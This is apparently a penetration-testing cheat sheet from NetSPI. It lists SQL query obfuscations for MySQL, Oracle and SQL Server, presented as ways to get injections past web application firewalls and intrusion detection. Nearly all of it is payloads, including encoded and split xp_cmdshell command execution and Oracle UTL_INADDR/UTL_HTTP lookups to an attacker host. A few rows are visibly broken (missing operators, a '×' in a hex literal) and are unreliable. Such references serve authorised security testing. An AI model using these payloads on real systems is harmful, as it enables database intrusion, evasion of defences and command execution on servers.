Obfuscating Queries
Obfuscating queries aids in bypassing Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). Below are examples of basic query obfuscations, they may require modification before being applied to certain injections.
| Description | Query |
|---|---|
| ASCII > Char | SELECT char(65) |
| Char > ASCII | SELECT ascii('A') |
| Hex | SELECT 0x4A414B45 |
| Hex > Int | SELECT 0x20 + 0x40 |
| Unhex/hex | unhex(hex(user())) |
| Bitwise AND | SELECT 6 & 2 |
| Bitwise OR | SELECT 6 |
| Bitwise Negation | SELECT ~6 |
| Bitwise XOR | SELECT 6 ^ 2 |
| Right Shift | SELECT 6>>2 |
| Left Shift | SELECT 6<<2 |
| Substring | SELECT substr('abcd', 3, 2) substr(string, index, length) |
| Casting | SELECT cast('1' AS unsigned integer) SELECT cast('123' AS char) |
| Concatenation | SELECT concat('net','spi') SELECT 'n' 'et' 'spi' |
| No Quotes | SELECT CONCAT(CHAR(74),CHAR(65),CHAR(75),CHAR(69)) |
| Block comment | SELECT/*block comment*/"test" |
| Single line comment | SELECT 1 -- comments out rest of line SELECT 1 # comments out rest of line SELECT 1 --+ - Comments out rest of the line SELECT 1 --+- - Comments out rest of the line SELECT 1 -- - - Comments out rest of the line SELECT 1 %00 - Comments out rest of the line |
| In-line comment | SEL/*_*/ECT * FR/*_*/OM |
| No Spaces | SELECT(username)FROM(USERS)WHERE(username='netspi') |
| Allowed Whitespaces | 09, 0A, 0B, 0C, 0D, A0, 20 |
| URL Encode | SELECT%20%2A%20FROM%20USERS |
| Double URL Encode | SELECT%2520%2A%2520FROM%2520USERS |
| Invalid Percent Encode | %SEL%ECT * F%R%OM U%S%ERS |
| character obfuscation | SeLeCt * FrOm |
Further reading here
Obfuscating Queries
Obfuscating queries aids in bypassing Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). Below are examples of basic query obfuscations, they may require modification before being applied to certain injections.
| Description | Query |
|---|---|
| ASCII > Char | SELECT char(65) from dual |
| Char > ASCII | SELECT ascii('A') from dual |
| Bitwise AND | SELECT 6 & 2 from dual |
| Bitwise OR | SELECT 6 from dual |
| Bitwise Negation | SELECT ~6 from dual |
| Bitwise XOR | SELECT 6 ^ 2 from dual |
| Select Nth Char | SELECT substr('abcd', 3, 1) FROM dual; -- Returns 3rd charcter, 'c' |
| Substring | SELECT substr('abcd', 3, 2) from dual substr(string, index, length) |
| Casting | select CAST(12 AS CHAR(32)) from dual |
| Concatenation | SELECT concat('net','spi') from dual |
| Comments | SELECT 1 FROM dual -- comment |
| If Statement | BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; |
| Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- Returns 1 SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- Returns 2 |
| Time Delay | BEGIN DBMS_LOCK.SLEEP(5); END; (Requires Privileges) SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; |
| Select Nth Row | SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; -- Returns 9th row |
| Bitwise AND | SELECT bitand(6,2) FROM dual; -- Returns 2 SELECT bitand(6,1) FROM dual; -- Returns 0 |
| String Concatenation | SELECT 'A' || 'B' FROM dual; -- Returns AB |
| Avoiding Quotes | SELECT chr(65) || chr(66) FROM dual; -- Returns AB |
| Hex Encoding | SELECT 0x75736572 FROM dual; |
Obfuscating Queries
Obfuscating queries aids in bypassing Web Application Firewalls (WAFs) and Intrusion Detection/Prevention Systems (IDS/IPS). Below are examples of basic query obfuscations, they may require modification before being applied to certain injections.
| Description | Query |
|---|---|
| ASCII > Char | SELECT char(65) |
| Char > ASCII | SELECT ascii('A') |
| Hex > Int | SELECT 0x20 + 0x40 |
| Bitwise AND | SELECT 6 & 2 |
| Bitwise OR | SELECT 6 |
| Bitwise Negation | SELECT ~6 |
| Bitwise XOR | SELECT 6 ^ 2 |
| Substring | SELECT substring('abcd', 3, 2) substring(string, index, length) |
| Casting | SELECT cast('1' AS unsigned integer) SELECT cast('123' AS char) |
| Concatenation | SELECT concat('net','spi') |
| Comments | SELECT 1 --comment SELECT/*comment*/1 |
| Avoiding Quotes | SELECT char(65)+char(66) -- returns AB |
| Avoid semicolon with %0d | %0dwaitfor+delay+'0:0:10'-- |
| Bypass Case Filtering | EXEC xP_cMdsheLL 'dir'; |
| Avoid Spaces - With Comments | EXEC/**/xp_cmdshell/**/'dir';-- ';ex/**/ec xp_cmds/**/hell 'dir'; |
| Avoid Query Detection - with concatenation | DECLARE @cmd as varchar(3000);SET @cmd = 'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+""+'d'+'i'+'r'+"";exec(@cmd); |
| Avoid Query Detection - Char Encoding | DECLARE @cmd as varchar(3000);SET @cmd =(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+CHAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR(46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100)+CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+CHAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC(@cmd); |
| Avoid Query Detection - Base64 Encoding | DECLARE @data varchar(max), @XmlData xml;SET @data = 'ZXhlYyBtYXN0ZXIuLnhwX2NtZHNoZWxsICdkaXIn';SET @XmlData = CAST('' + @data + '' as xml);SET @data = CONVERT(varchar(max), @XmlData.value('(data)[1]', 'varbinary(max)'));exec (@data); |
| Avoid Query Detection - Nchar Encoding | DECLARE @cmd as nvarchar(3000);SET @cmd =(nchar(101)+nchar(120)+nchar(101)+nchar(99)+nchar(32)+nchar(109)+nchar(97)+nchar(115)+nchar(116)+nchar(101)+nchar(114)+nchar(46)+nchar(46)+nchar(120)+nchar(112)+nchar(95)+nchar(99)+nchar(109)+nchar(100)+nchar(115)+nchar(104)+nchar(101)+nchar(108)+nchar(108)+nchar(32)+nchar(39)+nchar(100)+nchar(105)+nchar(114)+nchar(39)+nchar(59));EXEC(@cmd); |
| Avoid Query Detection - Binary Encoded ASCII + CAST | DECLARE @cmd as varchar(MAX);SET @cmd = cast(0x78705F636D647368656C6C202764697227 as varchar(MAX));exec(@cmd); |
| Avoid Query Detection - Binary Encoded ASCII + CONVERT | DECLARE @cmd as varchar(MAX);SET @cmd = convert(varchar(MAX),0x78705F636D647368656C6C202764697227);exec(@cmd); |
| Avoid Query Detection - varbinary(MAX) | DECLARE @cmd as varchar(MAX);SET @cmd = convert(varchar(0),0x78705F636D647368656C6C202764697227);exec(@cmd); |
| Avoid EXEC() - sp_sqlexec | DECLARE @cmd as varchar(3000);SET @cmd = convert(varchar(0),0×78705F636D647368656C6C202764697227);exec sp_sqlexec @cmd; |
| Execute xp_cmdshell 'dir' | DECLARE @tmp as varchar(MAX); SET @tmp = char(88)+char(80)+char(95)+char(67)+char(77)+ char(68)+char(83)+char(72)+char(69)+char(76)+char(76); exec @tmp 'dir'; |
© 2024 Copyright by NetSPI. All rights reserved.